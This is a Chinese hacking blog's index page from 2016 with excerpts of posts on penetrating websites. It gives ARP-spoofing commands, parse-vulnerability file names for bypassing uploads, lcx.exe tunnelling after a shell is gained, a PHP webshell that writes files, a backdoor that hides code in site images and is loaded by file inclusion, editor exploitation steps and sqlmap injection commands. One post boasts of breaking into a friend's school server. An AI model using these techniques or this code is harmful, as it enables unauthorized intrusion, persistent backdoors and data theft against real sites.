[转]一个对指定网站的渗透思路

Adian | 学习笔记 | 2016-08-12
恩,我是萌萌哒A.   [阅读全文]
ė252次浏览 60条评论 0

Xss绕过技术Pdf下载

Adian | 资源发布 | 2016-07-22
发一下备忘撒   XSS绕过技术_IT168文库.pdf [阅读全文]
ė118次浏览 60条评论 0

简单的Kali使用备忘

Adian | 学习笔记 | 2016-07-22
断网攻击 Arpspoof  -i 网卡 -t 目标IP 网关 Fping -asg 192.168.1.0/24 ==>查看内网ip 开启内网流量转发 echo 1 >/proc/sys/net/ipv4(6)/ip_forward 获取被欺骗者浏览的图片 driftnet -i eth0 (网卡 [阅读全文]
ė140次浏览 60条评论 0

解析漏洞总结

Adian | 学习笔记 | 2016-07-15
IIS6.0搭建平台 1.文件命名 正常命名文件 logo.jpg 触发解析漏洞命名 logo.asp;.xx.jpg(xx可有可无,任意字符) 2.文件夹命名 正常文件夹路径 ../image/qq.jpg 触发解析漏洞文件路径 ../image.asp/qq.jpg IIS7.x uginx低版本 [阅读全文]
ė196次浏览 60条评论 0

记一次提下朋友学校服务器

Adian | 渗透实战 | 2016-07-07
今天本来是拿下了本地一所高中的后台 正在和我挺好的一个哥们嘚瑟 毕竟我长得那么帅(嘿!怎么还打人呢你) 他说有本事你来日我们学校的,日下的话送你一个电子烟 这就很尴尬了,那咱们必须搞一个 -----------------------------------------正文密封线---------------------------------------------------- [阅读全文]
ė491次浏览 63条评论 0

使用lcx.exe进行内网转发

Adian | 学习笔记 | 2016-07-05
在Getshell后 上传lcx.exe 然后执行 lcx.exe -salve x.x.x.x 3389(外网ip和转发的端口) x.x.x.x 1234(内网ip和远程端口)   本机运行 lcx.exe -listen 1234 2000 然后连接127.0.0.1:2000 [阅读全文]
ė183次浏览 61条评论 0

自己跟着教程做的PHP小马

Adian | 资源发布 | 2016-07-03
Adian自制小马 本文件路径:   保存路径:   输入你要保存的内容:       $_path = $_POST['p']; $_text = $_POST['t']; $_file =fopen($_path,'w+'); fwrite($_file,$_text); fclos [阅读全文]
ė244次浏览 60条评论 0

文件包含维持后门权限

Adian | 学习笔记 | 2016-07-02
在必备图片中插入一句话(logo等) 在正常页面进行文件包含(index.php login.php) $x=$_GET['x']; include($x); 站长不会神经病似的去看图片中是否含有后门代码 于是打开正常页面http://www.xxxx.com/news.php?x=xxxxxx.jpg 即可用菜刀链接 [阅读全文]
ė197次浏览 60条评论 0

编辑器漏洞利用

Adian | 学习笔记 | 2016-06-30
 eweb编辑器漏洞 编辑器漏洞利用核心:获取编辑器地址 1.Ewebeditor编辑器漏洞利用过程:获取编辑器地址,尝试获取编辑器后台地址,尝试默认账号密码登陆,如登陆失败可尝试下载默认数据库,破解其账号密码,登陆后台,尝试添加上传类型,如无确认按钮,可新增样式,新增插入图片,浏览上传,获取后门地址。 默认后台地址:ewebeditor/admin_l [阅读全文]
ė189次浏览 60条评论 0

使用sqlmap进行简单注入

Adian | 学习笔记 | 2016-06-29
教程文本里面有,我就复制一下备忘了 后台post注入: sqlmap.py -u http://127.0.0.1:88/p.php --data "u=admin&p=123456"   //判断注入 sqlmap.py -u http://127.0.0.1:88/p.php --data "u=admin&p=123456" -- [阅读全文]
ė264次浏览 60条评论 0